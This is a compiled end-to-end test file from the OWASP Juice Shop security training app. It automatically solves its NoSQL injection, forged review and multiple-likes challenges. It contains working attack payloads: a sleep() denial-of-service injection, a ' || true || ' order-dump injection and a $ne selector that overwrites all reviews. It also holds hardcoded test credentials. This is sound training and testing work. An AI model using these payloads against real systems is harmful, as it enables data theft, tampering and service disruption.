"use strict";
/*
 * Copyright (c) 2014-2022 Bjoern Kimminich & the OWASP Juice Shop contributors.
 * SPDX-License-Identifier: MIT
 */
Object.defineProperty(exports, "__esModule", { value: true });
const config = require("config");
const protractor_1 = require("protractor");
const e2eHelpers_1 = require("./e2eHelpers");
const utils = require('../../lib/utils');
describe('/rest/products/reviews', () => {
    beforeEach(() => {
        void protractor_1.browser.get(`${e2eHelpers_1.basePath}/#/search`);
    });
    if (!utils.disableOnContainerEnv()) {
        describe('challenge "NoSQL DoS"', () => {
            (0, e2eHelpers_1.beforeEachLogin)({ email: `admin@${config.get('application.domain')}`, password: 'admin123' });
            it('should be possible to inject a command into the get route', () => {
                void protractor_1.browser.waitForAngularEnabled(false);
                void protractor_1.browser.executeScript((baseUrl) => {
                    const xhttp = new XMLHttpRequest();
                    xhttp.onreadystatechange = function () {
                        if (this.status === 200) {
                            console.log('Success');
                        }
                    };
                    xhttp.open('GET', `${baseUrl}/rest/products/sleep(1000)/reviews`, true);
                    xhttp.setRequestHeader('Content-type', 'text/plain');
                    xhttp.send();
                }, protractor_1.browser.baseUrl);
                void protractor_1.browser.driver.sleep(5000);
                void protractor_1.browser.waitForAngularEnabled(true);
            });
            (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'NoSQL DoS' });
        });
        describe('challenge "NoSQL Exfiltration"', () => {
            it('should be possible to inject and get all the orders', () => {
                void protractor_1.browser.waitForAngularEnabled(false);
                void protractor_1.browser.executeScript((baseUrl) => {
                    const xhttp = new XMLHttpRequest();
                    xhttp.onreadystatechange = function () {
                        if (this.status === 200) {
                            console.log('Success');
                        }
                    };
                    xhttp.open('GET', `${baseUrl}/rest/track-order/%27%20%7C%7C%20true%20%7C%7C%20%27`, true);
                    xhttp.setRequestHeader('Content-type', 'text/plain');
                    xhttp.send();
                }, protractor_1.browser.baseUrl);
                void protractor_1.browser.driver.sleep(1000);
                void protractor_1.browser.waitForAngularEnabled(true);
            });
            (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'NoSQL Exfiltration' });
        });
    }
    describe('challenge "NoSQL Manipulation"', () => {
        it('should be possible to inject a selector into the update route', () => {
            void protractor_1.browser.waitForAngularEnabled(false);
            void protractor_1.browser.executeScript(`var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 200) { console.log("Success"); } }; xhttp.open("PATCH","${protractor_1.browser.baseUrl}/rest/products/reviews", true); xhttp.setRequestHeader("Content-type","application/json"); xhttp.setRequestHeader("Authorization", \`Bearer $\{localStorage.getItem("token")}\`); xhttp.send(JSON.stringify({ "id": { "$ne": -1 }, "message": "NoSQL Injection!" }));`); // eslint-disable-line
            void protractor_1.browser.driver.sleep(1000);
            void protractor_1.browser.waitForAngularEnabled(true);
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'NoSQL Manipulation' });
    });
    describe('challenge "Forged Review"', () => {
        (0, e2eHelpers_1.beforeEachLogin)({ email: `mc.safesearch@${config.get('application.domain')}`, password: 'Mr. N00dles' });
        it('should be possible to edit any existing review', () => {
            void protractor_1.browser.waitForAngularEnabled(false);
            void protractor_1.browser.executeScript((baseUrl) => {
                const xhttp = new XMLHttpRequest();
                xhttp.onreadystatechange = function () {
                    if (this.status === 200) {
                        const reviewId = JSON.parse(this.responseText).data[0]._id;
                        editReview(reviewId);
                    }
                };
                xhttp.open('GET', `${baseUrl}/rest/products/1/reviews`, true);
                xhttp.setRequestHeader('Content-type', 'text/plain');
                xhttp.send();
                function editReview(reviewId) {
                    const xhttp = new XMLHttpRequest();
                    xhttp.onreadystatechange = function () {
                        if (this.status === 200) {
                            console.log('Success');
                        }
                    };
                    xhttp.open('PATCH', `${baseUrl}/rest/products/reviews`, true);
                    xhttp.setRequestHeader('Content-type', 'application/json');
                    xhttp.setRequestHeader('Authorization', `Bearer ${localStorage.getItem('token')}`);
                    xhttp.send(JSON.stringify({ id: reviewId, message: 'injected' }));
                }
            }, protractor_1.browser.baseUrl);
            void protractor_1.browser.driver.sleep(5000);
            void protractor_1.browser.waitForAngularEnabled(true);
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Forged Review' });
    });
    describe('challenge "Multiple Likes"', () => {
        (0, e2eHelpers_1.beforeEachLogin)({ email: `mc.safesearch@${config.get('application.domain')}`, password: 'Mr. N00dles' });
        it('should be possible to like reviews multiple times', () => {
            void protractor_1.browser.waitForAngularEnabled(false);
            void protractor_1.browser.executeScript((baseUrl) => {
                const xhttp = new XMLHttpRequest();
                xhttp.onreadystatechange = function () {
                    if (this.status === 200) {
                        const reviewId = JSON.parse(this.responseText).data[0]._id;
                        sendPostRequest(reviewId);
                        sendPostRequest(reviewId);
                        sendPostRequest(reviewId);
                    }
                };
                xhttp.open('GET', `${baseUrl}/rest/products/1/reviews`, true);
                xhttp.setRequestHeader('Content-type', 'text/plain');
                xhttp.send();
                function sendPostRequest(reviewId) {
                    const xhttp = new XMLHttpRequest();
                    xhttp.onreadystatechange = function () {
                        if (this.status === 200) {
                            console.log('Success');
                        }
                    };
                    xhttp.open('POST', `${baseUrl}/rest/products/reviews`, true);
                    xhttp.setRequestHeader('Content-type', 'application/json');
                    xhttp.setRequestHeader('Authorization', `Bearer ${localStorage.getItem('token')}`);
                    xhttp.send(JSON.stringify({ id: reviewId }));
                }
            }, protractor_1.browser.baseUrl);
            void protractor_1.browser.driver.sleep(5000);
            void protractor_1.browser.waitForAngularEnabled(true);
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Multiple Likes' });
    });
});
//# sourceMappingURL=noSqlSpec.js.map